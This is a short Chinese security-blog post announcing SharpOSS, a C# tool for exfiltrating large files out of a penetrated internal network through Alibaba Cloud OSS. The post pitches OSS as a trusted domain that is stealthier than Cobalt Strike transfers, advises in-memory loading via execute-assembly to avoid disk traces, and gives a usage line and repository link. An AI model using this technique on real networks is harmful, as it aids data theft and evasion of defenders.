SharpOSS-利用阿里云OSS实现内网渗透中的快速文件上传

  • A+
所属分类:安全文章

内网需求

“内网渗透的本质是信息收集”,常常会收集到一些体积较大的文件或者是源码进行分析利用。而网络情况复杂的情况下,通过菜刀一类webshell管理工具或CS一类C2工具来进行传输文件是非常慢的,所以经常会用到AliyunOSS来进行快速文件传输。同时aliyunOSS是白域名,比cs传输文件更为隐秘就看了一下aliyun-oss-csharp-sdk实现了这个功能。

Usage

建议可内存加载,尽量用cs的execute-assembly内存加载,做到尽可能的不落地。

> SharpOSS.exeAuthor: UknowGithub: https://github.com/uknowsec/SharpOSSUsage:  SharpOSS.exe bucketName accessKeyId accessKeySecret endpoint UploadFilePath

github

https://github.com/uknowsec/SharpOSS

代码仅放出了主要部分,需要引用aliyun-oss-csharp-sdk。有兴趣的自行反编译exe。

关注公众号回复 SharpOSS 可直接获取下载地址。


发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: